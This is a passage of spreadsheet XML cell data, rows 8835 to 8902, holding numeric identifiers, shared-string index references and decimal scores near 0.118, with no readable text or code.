      <c r="C8835" s="2" t="s">
        <v>8417</v>
      </c>
      <c r="D8835" s="2">
        <v>1.0</v>
      </c>
      <c r="E8835" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8835" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8836" ht="15.75" customHeight="1">
      <c r="A8836" s="1">
        <v>14702.0</v>
      </c>
      <c r="B8836" s="2">
        <v>4.0579423E7</v>
      </c>
      <c r="C8836" s="2" t="s">
        <v>8418</v>
      </c>
      <c r="D8836" s="2">
        <v>1.0</v>
      </c>
      <c r="E8836" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8836" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8837" ht="15.75" customHeight="1">
      <c r="A8837" s="1">
        <v>15120.0</v>
      </c>
      <c r="B8837" s="2">
        <v>4.1880091E7</v>
      </c>
      <c r="C8837" s="2" t="s">
        <v>8419</v>
      </c>
      <c r="D8837" s="2">
        <v>1.0</v>
      </c>
      <c r="E8837" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8837" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8838" ht="15.75" customHeight="1">
      <c r="A8838" s="1">
        <v>15528.0</v>
      </c>
      <c r="B8838" s="2">
        <v>4.3301444E7</v>
      </c>
      <c r="C8838" s="2" t="s">
        <v>8420</v>
      </c>
      <c r="D8838" s="2">
        <v>1.0</v>
      </c>
      <c r="E8838" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8838" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8839" ht="15.75" customHeight="1">
      <c r="A8839" s="1">
        <v>15813.0</v>
      </c>
      <c r="B8839" s="2">
        <v>4.4255735E7</v>
      </c>
      <c r="C8839" s="2" t="s">
        <v>8421</v>
      </c>
      <c r="D8839" s="2">
        <v>1.0</v>
      </c>
      <c r="E8839" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8839" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8840" ht="15.75" customHeight="1">
      <c r="A8840" s="1">
        <v>15850.0</v>
      </c>
      <c r="B8840" s="2">
        <v>4.4437146E7</v>
      </c>
      <c r="C8840" s="2" t="s">
        <v>8422</v>
      </c>
      <c r="D8840" s="2">
        <v>1.0</v>
      </c>
      <c r="E8840" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8840" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8841" ht="15.75" customHeight="1">
      <c r="A8841" s="1">
        <v>16186.0</v>
      </c>
      <c r="B8841" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C8841" s="2" t="s">
        <v>8423</v>
      </c>
      <c r="D8841" s="2">
        <v>1.0</v>
      </c>
      <c r="E8841" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8841" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8842" ht="15.75" customHeight="1">
      <c r="A8842" s="1">
        <v>16921.0</v>
      </c>
      <c r="B8842" s="2">
        <v>4.8137942E7</v>
      </c>
      <c r="C8842" s="2" t="s">
        <v>8424</v>
      </c>
      <c r="D8842" s="2">
        <v>1.0</v>
      </c>
      <c r="E8842" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8842" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8843" ht="15.75" customHeight="1">
      <c r="A8843" s="1">
        <v>17582.0</v>
      </c>
      <c r="B8843" s="2">
        <v>5.027548E7</v>
      </c>
      <c r="C8843" s="2" t="s">
        <v>8425</v>
      </c>
      <c r="D8843" s="2">
        <v>1.0</v>
      </c>
      <c r="E8843" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8843" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8844" ht="15.75" customHeight="1">
      <c r="A8844" s="1">
        <v>18479.0</v>
      </c>
      <c r="B8844" s="2">
        <v>5.286925E7</v>
      </c>
      <c r="C8844" s="2" t="s">
        <v>8426</v>
      </c>
      <c r="D8844" s="2">
        <v>1.0</v>
      </c>
      <c r="E8844" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8844" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8845" ht="15.75" customHeight="1">
      <c r="A8845" s="1">
        <v>19463.0</v>
      </c>
      <c r="B8845" s="2">
        <v>5.5776933E7</v>
      </c>
      <c r="C8845" s="2" t="s">
        <v>8427</v>
      </c>
      <c r="D8845" s="2">
        <v>1.0</v>
      </c>
      <c r="E8845" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8845" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8846" ht="15.75" customHeight="1">
      <c r="A8846" s="1">
        <v>19464.0</v>
      </c>
      <c r="B8846" s="2">
        <v>5.5776933E7</v>
      </c>
      <c r="C8846" s="2" t="s">
        <v>8428</v>
      </c>
      <c r="D8846" s="2">
        <v>1.0</v>
      </c>
      <c r="E8846" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8846" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8847" ht="15.75" customHeight="1">
      <c r="A8847" s="1">
        <v>20304.0</v>
      </c>
      <c r="B8847" s="2">
        <v>1.1329568E7</v>
      </c>
      <c r="C8847" s="2" t="s">
        <v>8429</v>
      </c>
      <c r="D8847" s="2">
        <v>1.0</v>
      </c>
      <c r="E8847" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8847" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8848" ht="15.75" customHeight="1">
      <c r="A8848" s="1">
        <v>21734.0</v>
      </c>
      <c r="B8848" s="2">
        <v>2.5757746E7</v>
      </c>
      <c r="C8848" s="2" t="s">
        <v>8430</v>
      </c>
      <c r="D8848" s="2">
        <v>1.0</v>
      </c>
      <c r="E8848" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8848" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8849" ht="15.75" customHeight="1">
      <c r="A8849" s="1">
        <v>23753.0</v>
      </c>
      <c r="B8849" s="2">
        <v>7457540.0</v>
      </c>
      <c r="C8849" s="2" t="s">
        <v>8431</v>
      </c>
      <c r="D8849" s="2">
        <v>1.0</v>
      </c>
      <c r="E8849" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8849" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8850" ht="15.75" customHeight="1">
      <c r="A8850" s="1">
        <v>26340.0</v>
      </c>
      <c r="B8850" s="2">
        <v>1.6760997E7</v>
      </c>
      <c r="C8850" s="2" t="s">
        <v>8432</v>
      </c>
      <c r="D8850" s="2">
        <v>1.0</v>
      </c>
      <c r="E8850" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8850" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8851" ht="15.75" customHeight="1">
      <c r="A8851" s="1">
        <v>29264.0</v>
      </c>
      <c r="B8851" s="2">
        <v>3.0990373E7</v>
      </c>
      <c r="C8851" s="2" t="s">
        <v>8433</v>
      </c>
      <c r="D8851" s="2">
        <v>1.0</v>
      </c>
      <c r="E8851" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8851" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="8852" ht="15.75" customHeight="1">
      <c r="A8852" s="1">
        <v>2271.0</v>
      </c>
      <c r="B8852" s="2">
        <v>3.251117E7</v>
      </c>
      <c r="C8852" s="2" t="s">
        <v>8434</v>
      </c>
      <c r="D8852" s="2">
        <v>1.0</v>
      </c>
      <c r="E8852" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8852" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="8853" ht="15.75" customHeight="1">
      <c r="A8853" s="1">
        <v>9977.0</v>
      </c>
      <c r="B8853" s="2">
        <v>5.6946195E7</v>
      </c>
      <c r="C8853" s="2" t="s">
        <v>8435</v>
      </c>
      <c r="D8853" s="2">
        <v>1.0</v>
      </c>
      <c r="E8853" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8853" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="8854" ht="15.75" customHeight="1">
      <c r="A8854" s="1">
        <v>12091.0</v>
      </c>
      <c r="B8854" s="2">
        <v>2.6706477E7</v>
      </c>
      <c r="C8854" s="2" t="s">
        <v>8436</v>
      </c>
      <c r="D8854" s="2">
        <v>1.0</v>
      </c>
      <c r="E8854" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8854" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="8855" ht="15.75" customHeight="1">
      <c r="A8855" s="1">
        <v>33372.0</v>
      </c>
      <c r="B8855" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C8855" s="2" t="s">
        <v>8437</v>
      </c>
      <c r="D8855" s="2">
        <v>1.0</v>
      </c>
      <c r="E8855" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8855" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="8856" ht="15.75" customHeight="1">
      <c r="A8856" s="1">
        <v>621.0</v>
      </c>
      <c r="B8856" s="2">
        <v>1.9542029E7</v>
      </c>
      <c r="C8856" s="2" t="s">
        <v>8438</v>
      </c>
      <c r="D8856" s="2">
        <v>1.0</v>
      </c>
      <c r="E8856" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8856" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="8857" ht="15.75" customHeight="1">
      <c r="A8857" s="1">
        <v>2151.0</v>
      </c>
      <c r="B8857" s="2">
        <v>3.1633687E7</v>
      </c>
      <c r="C8857" s="2" t="s">
        <v>8439</v>
      </c>
      <c r="D8857" s="2">
        <v>1.0</v>
      </c>
      <c r="E8857" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8857" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="8858" ht="15.75" customHeight="1">
      <c r="A8858" s="1">
        <v>10669.0</v>
      </c>
      <c r="B8858" s="2">
        <v>1.4448507E7</v>
      </c>
      <c r="C8858" s="2" t="s">
        <v>8440</v>
      </c>
      <c r="D8858" s="2">
        <v>1.0</v>
      </c>
      <c r="E8858" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8858" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="8859" ht="15.75" customHeight="1">
      <c r="A8859" s="1">
        <v>19759.0</v>
      </c>
      <c r="B8859" s="2">
        <v>5.6714022E7</v>
      </c>
      <c r="C8859" s="2" t="s">
        <v>8441</v>
      </c>
      <c r="D8859" s="2">
        <v>1.0</v>
      </c>
      <c r="E8859" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8859" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="8860" ht="15.75" customHeight="1">
      <c r="A8860" s="1">
        <v>499.0</v>
      </c>
      <c r="B8860" s="2">
        <v>1.7843246E7</v>
      </c>
      <c r="C8860" s="2" t="s">
        <v>8442</v>
      </c>
      <c r="D8860" s="2">
        <v>1.0</v>
      </c>
      <c r="E8860" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8860" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8861" ht="15.75" customHeight="1">
      <c r="A8861" s="1">
        <v>928.0</v>
      </c>
      <c r="B8861" s="2">
        <v>2.2346356E7</v>
      </c>
      <c r="C8861" s="2" t="s">
        <v>8443</v>
      </c>
      <c r="D8861" s="2">
        <v>1.0</v>
      </c>
      <c r="E8861" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8861" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8862" ht="15.75" customHeight="1">
      <c r="A8862" s="1">
        <v>989.0</v>
      </c>
      <c r="B8862" s="2">
        <v>2.2885743E7</v>
      </c>
      <c r="C8862" s="2" t="s">
        <v>8444</v>
      </c>
      <c r="D8862" s="2">
        <v>1.0</v>
      </c>
      <c r="E8862" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8862" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8863" ht="15.75" customHeight="1">
      <c r="A8863" s="1">
        <v>2626.0</v>
      </c>
      <c r="B8863" s="2">
        <v>3.4528355E7</v>
      </c>
      <c r="C8863" s="2" t="s">
        <v>8445</v>
      </c>
      <c r="D8863" s="2">
        <v>1.0</v>
      </c>
      <c r="E8863" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8863" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8864" ht="15.75" customHeight="1">
      <c r="A8864" s="1">
        <v>3022.0</v>
      </c>
      <c r="B8864" s="2">
        <v>3.6424079E7</v>
      </c>
      <c r="C8864" s="2" t="s">
        <v>8446</v>
      </c>
      <c r="D8864" s="2">
        <v>1.0</v>
      </c>
      <c r="E8864" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8864" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8865" ht="15.75" customHeight="1">
      <c r="A8865" s="1">
        <v>3155.0</v>
      </c>
      <c r="B8865" s="2">
        <v>3.6995865E7</v>
      </c>
      <c r="C8865" s="2" t="s">
        <v>8447</v>
      </c>
      <c r="D8865" s="2">
        <v>1.0</v>
      </c>
      <c r="E8865" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8865" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8866" ht="15.75" customHeight="1">
      <c r="A8866" s="1">
        <v>4780.0</v>
      </c>
      <c r="B8866" s="2">
        <v>4.3439879E7</v>
      </c>
      <c r="C8866" s="2" t="s">
        <v>8448</v>
      </c>
      <c r="D8866" s="2">
        <v>1.0</v>
      </c>
      <c r="E8866" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8866" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8867" ht="15.75" customHeight="1">
      <c r="A8867" s="1">
        <v>4991.0</v>
      </c>
      <c r="B8867" s="2">
        <v>4.4145434E7</v>
      </c>
      <c r="C8867" s="2" t="s">
        <v>8449</v>
      </c>
      <c r="D8867" s="2">
        <v>1.0</v>
      </c>
      <c r="E8867" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8867" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8868" ht="15.75" customHeight="1">
      <c r="A8868" s="1">
        <v>6397.0</v>
      </c>
      <c r="B8868" s="2">
        <v>4.8466717E7</v>
      </c>
      <c r="C8868" s="2" t="s">
        <v>8450</v>
      </c>
      <c r="D8868" s="2">
        <v>1.0</v>
      </c>
      <c r="E8868" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8868" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8869" ht="15.75" customHeight="1">
      <c r="A8869" s="1">
        <v>7013.0</v>
      </c>
      <c r="B8869" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C8869" s="2" t="s">
        <v>8451</v>
      </c>
      <c r="D8869" s="2">
        <v>1.0</v>
      </c>
      <c r="E8869" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8869" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8870" ht="15.75" customHeight="1">
      <c r="A8870" s="1">
        <v>8198.0</v>
      </c>
      <c r="B8870" s="2">
        <v>5.3266169E7</v>
      </c>
      <c r="C8870" s="2" t="s">
        <v>8452</v>
      </c>
      <c r="D8870" s="2">
        <v>1.0</v>
      </c>
      <c r="E8870" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8870" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8871" ht="15.75" customHeight="1">
      <c r="A8871" s="1">
        <v>8385.0</v>
      </c>
      <c r="B8871" s="2">
        <v>5.3826696E7</v>
      </c>
      <c r="C8871" s="2" t="s">
        <v>8453</v>
      </c>
      <c r="D8871" s="2">
        <v>1.0</v>
      </c>
      <c r="E8871" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8871" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8872" ht="15.75" customHeight="1">
      <c r="A8872" s="1">
        <v>9107.0</v>
      </c>
      <c r="B8872" s="2">
        <v>5.5167792E7</v>
      </c>
      <c r="C8872" s="2" t="s">
        <v>8454</v>
      </c>
      <c r="D8872" s="2">
        <v>1.0</v>
      </c>
      <c r="E8872" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8872" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8873" ht="15.75" customHeight="1">
      <c r="A8873" s="1">
        <v>28893.0</v>
      </c>
      <c r="B8873" s="2">
        <v>2.9275661E7</v>
      </c>
      <c r="C8873" s="2" t="s">
        <v>8455</v>
      </c>
      <c r="D8873" s="2">
        <v>1.0</v>
      </c>
      <c r="E8873" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8873" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="8874" ht="15.75" customHeight="1">
      <c r="A8874" s="1">
        <v>5174.0</v>
      </c>
      <c r="B8874" s="2">
        <v>4.4751794E7</v>
      </c>
      <c r="C8874" s="2" t="s">
        <v>8456</v>
      </c>
      <c r="D8874" s="2">
        <v>1.0</v>
      </c>
      <c r="E8874" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8874" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="8875" ht="15.75" customHeight="1">
      <c r="A8875" s="1">
        <v>28435.0</v>
      </c>
      <c r="B8875" s="2">
        <v>2.6481414E7</v>
      </c>
      <c r="C8875" s="2" t="s">
        <v>8457</v>
      </c>
      <c r="D8875" s="2">
        <v>1.0</v>
      </c>
      <c r="E8875" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8875" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="8876" ht="15.75" customHeight="1">
      <c r="A8876" s="1">
        <v>1620.0</v>
      </c>
      <c r="B8876" s="2">
        <v>2.7885744E7</v>
      </c>
      <c r="C8876" s="2" t="s">
        <v>8458</v>
      </c>
      <c r="D8876" s="2">
        <v>1.0</v>
      </c>
      <c r="E8876" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8876" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8877" ht="15.75" customHeight="1">
      <c r="A8877" s="1">
        <v>6258.0</v>
      </c>
      <c r="B8877" s="2">
        <v>4.8115828E7</v>
      </c>
      <c r="C8877" s="2" t="s">
        <v>8459</v>
      </c>
      <c r="D8877" s="2">
        <v>1.0</v>
      </c>
      <c r="E8877" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8877" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8878" ht="15.75" customHeight="1">
      <c r="A8878" s="1">
        <v>11707.0</v>
      </c>
      <c r="B8878" s="2">
        <v>2.3585264E7</v>
      </c>
      <c r="C8878" s="2" t="s">
        <v>8460</v>
      </c>
      <c r="D8878" s="2">
        <v>1.0</v>
      </c>
      <c r="E8878" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8878" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8879" ht="15.75" customHeight="1">
      <c r="A8879" s="1">
        <v>11927.0</v>
      </c>
      <c r="B8879" s="2">
        <v>2.5398994E7</v>
      </c>
      <c r="C8879" s="2" t="s">
        <v>8461</v>
      </c>
      <c r="D8879" s="2">
        <v>1.0</v>
      </c>
      <c r="E8879" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8879" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8880" ht="15.75" customHeight="1">
      <c r="A8880" s="1">
        <v>15796.0</v>
      </c>
      <c r="B8880" s="2">
        <v>4.4211439E7</v>
      </c>
      <c r="C8880" s="2" t="s">
        <v>8462</v>
      </c>
      <c r="D8880" s="2">
        <v>1.0</v>
      </c>
      <c r="E8880" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8880" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8881" ht="15.75" customHeight="1">
      <c r="A8881" s="1">
        <v>27251.0</v>
      </c>
      <c r="B8881" s="2">
        <v>2.1084745E7</v>
      </c>
      <c r="C8881" s="2" t="s">
        <v>8463</v>
      </c>
      <c r="D8881" s="2">
        <v>1.0</v>
      </c>
      <c r="E8881" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8881" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8882" ht="15.75" customHeight="1">
      <c r="A8882" s="1">
        <v>27586.0</v>
      </c>
      <c r="B8882" s="2">
        <v>2.2542472E7</v>
      </c>
      <c r="C8882" s="2" t="s">
        <v>8464</v>
      </c>
      <c r="D8882" s="2">
        <v>1.0</v>
      </c>
      <c r="E8882" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8882" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="8883" ht="15.75" customHeight="1">
      <c r="A8883" s="1">
        <v>6522.0</v>
      </c>
      <c r="B8883" s="2">
        <v>4.8801555E7</v>
      </c>
      <c r="C8883" s="2" t="s">
        <v>8465</v>
      </c>
      <c r="D8883" s="2">
        <v>1.0</v>
      </c>
      <c r="E8883" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8883" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="8884" ht="15.75" customHeight="1">
      <c r="A8884" s="1">
        <v>11327.0</v>
      </c>
      <c r="B8884" s="2">
        <v>2.1084701E7</v>
      </c>
      <c r="C8884" s="2" t="s">
        <v>8466</v>
      </c>
      <c r="D8884" s="2">
        <v>1.0</v>
      </c>
      <c r="E8884" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8884" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="8885" ht="15.75" customHeight="1">
      <c r="A8885" s="1">
        <v>13989.0</v>
      </c>
      <c r="B8885" s="2">
        <v>3.7376808E7</v>
      </c>
      <c r="C8885" s="2" t="s">
        <v>8467</v>
      </c>
      <c r="D8885" s="2">
        <v>1.0</v>
      </c>
      <c r="E8885" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8885" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="8886" ht="15.75" customHeight="1">
      <c r="A8886" s="1">
        <v>6393.0</v>
      </c>
      <c r="B8886" s="2">
        <v>4.8461609E7</v>
      </c>
      <c r="C8886" s="2" t="s">
        <v>8468</v>
      </c>
      <c r="D8886" s="2">
        <v>1.0</v>
      </c>
      <c r="E8886" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8886" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8887" ht="15.75" customHeight="1">
      <c r="A8887" s="1">
        <v>9239.0</v>
      </c>
      <c r="B8887" s="2">
        <v>5.5465936E7</v>
      </c>
      <c r="C8887" s="2" t="s">
        <v>8469</v>
      </c>
      <c r="D8887" s="2">
        <v>1.0</v>
      </c>
      <c r="E8887" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8887" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8888" ht="15.75" customHeight="1">
      <c r="A8888" s="1">
        <v>11108.0</v>
      </c>
      <c r="B8888" s="2">
        <v>1.8671866E7</v>
      </c>
      <c r="C8888" s="2" t="s">
        <v>8470</v>
      </c>
      <c r="D8888" s="2">
        <v>1.0</v>
      </c>
      <c r="E8888" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8888" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8889" ht="15.75" customHeight="1">
      <c r="A8889" s="1">
        <v>13475.0</v>
      </c>
      <c r="B8889" s="2">
        <v>3.530774E7</v>
      </c>
      <c r="C8889" s="2" t="s">
        <v>8471</v>
      </c>
      <c r="D8889" s="2">
        <v>1.0</v>
      </c>
      <c r="E8889" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8889" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8890" ht="15.75" customHeight="1">
      <c r="A8890" s="1">
        <v>13560.0</v>
      </c>
      <c r="B8890" s="2">
        <v>3.5666495E7</v>
      </c>
      <c r="C8890" s="2" t="s">
        <v>8472</v>
      </c>
      <c r="D8890" s="2">
        <v>1.0</v>
      </c>
      <c r="E8890" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8890" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8891" ht="15.75" customHeight="1">
      <c r="A8891" s="1">
        <v>13605.0</v>
      </c>
      <c r="B8891" s="2">
        <v>3.5809504E7</v>
      </c>
      <c r="C8891" s="2" t="s">
        <v>8473</v>
      </c>
      <c r="D8891" s="2">
        <v>1.0</v>
      </c>
      <c r="E8891" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8891" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8892" ht="15.75" customHeight="1">
      <c r="A8892" s="1">
        <v>14806.0</v>
      </c>
      <c r="B8892" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C8892" s="2" t="s">
        <v>8474</v>
      </c>
      <c r="D8892" s="2">
        <v>1.0</v>
      </c>
      <c r="E8892" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8892" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8893" ht="15.75" customHeight="1">
      <c r="A8893" s="1">
        <v>30165.0</v>
      </c>
      <c r="B8893" s="2">
        <v>3.7054192E7</v>
      </c>
      <c r="C8893" s="2" t="s">
        <v>8475</v>
      </c>
      <c r="D8893" s="2">
        <v>1.0</v>
      </c>
      <c r="E8893" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8893" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="8894" ht="15.75" customHeight="1">
      <c r="A8894" s="1">
        <v>784.0</v>
      </c>
      <c r="B8894" s="2">
        <v>2.1205607E7</v>
      </c>
      <c r="C8894" s="2" t="s">
        <v>8476</v>
      </c>
      <c r="D8894" s="2">
        <v>1.0</v>
      </c>
      <c r="E8894" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8894" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="8895" ht="15.75" customHeight="1">
      <c r="A8895" s="1">
        <v>2509.0</v>
      </c>
      <c r="B8895" s="2">
        <v>3.3981423E7</v>
      </c>
      <c r="C8895" s="5" t="s">
        <v>8477</v>
      </c>
      <c r="D8895" s="2">
        <v>1.0</v>
      </c>
      <c r="E8895" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8895" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="8896" ht="15.75" customHeight="1">
      <c r="A8896" s="1">
        <v>8340.0</v>
      </c>
      <c r="B8896" s="2">
        <v>5.370853E7</v>
      </c>
      <c r="C8896" s="2" t="s">
        <v>8478</v>
      </c>
      <c r="D8896" s="2">
        <v>1.0</v>
      </c>
      <c r="E8896" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8896" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="8897" ht="15.75" customHeight="1">
      <c r="A8897" s="1">
        <v>157.0</v>
      </c>
      <c r="B8897" s="2">
        <v>1.3732786E7</v>
      </c>
      <c r="C8897" s="2" t="s">
        <v>8479</v>
      </c>
      <c r="D8897" s="2">
        <v>1.0</v>
      </c>
      <c r="E8897" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8897" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="8898" ht="15.75" customHeight="1">
      <c r="A8898" s="1">
        <v>11105.0</v>
      </c>
      <c r="B8898" s="2">
        <v>1.8652804E7</v>
      </c>
      <c r="C8898" s="2" t="s">
        <v>8480</v>
      </c>
      <c r="D8898" s="2">
        <v>1.0</v>
      </c>
      <c r="E8898" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8898" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="8899" ht="15.75" customHeight="1">
      <c r="A8899" s="1">
        <v>13727.0</v>
      </c>
      <c r="B8899" s="2">
        <v>3.6360656E7</v>
      </c>
      <c r="C8899" s="2" t="s">
        <v>8481</v>
      </c>
      <c r="D8899" s="2">
        <v>1.0</v>
      </c>
      <c r="E8899" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8899" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="8900" ht="15.75" customHeight="1">
      <c r="A8900" s="1">
        <v>29380.0</v>
      </c>
      <c r="B8900" s="2">
        <v>3.1810279E7</v>
      </c>
      <c r="C8900" s="2" t="s">
        <v>8482</v>
      </c>
      <c r="D8900" s="2">
        <v>1.0</v>
      </c>
      <c r="E8900" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8900" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="8901" ht="15.75" customHeight="1">
      <c r="A8901" s="1">
        <v>4631.0</v>
      </c>
      <c r="B8901" s="2">
        <v>4.3001838E7</v>
      </c>
      <c r="C8901" s="2" t="s">
        <v>8483</v>
      </c>
      <c r="D8901" s="2">
        <v>1.0</v>
      </c>
      <c r="E8901" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8901" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="8902" ht="15.75" customHeight="1">
      <c r="A8902" s="1">
        <v>13143.0</v>
      </c>
      <c r="B8902" s="2">
        <v>3.3757767E7</v>
      </c>
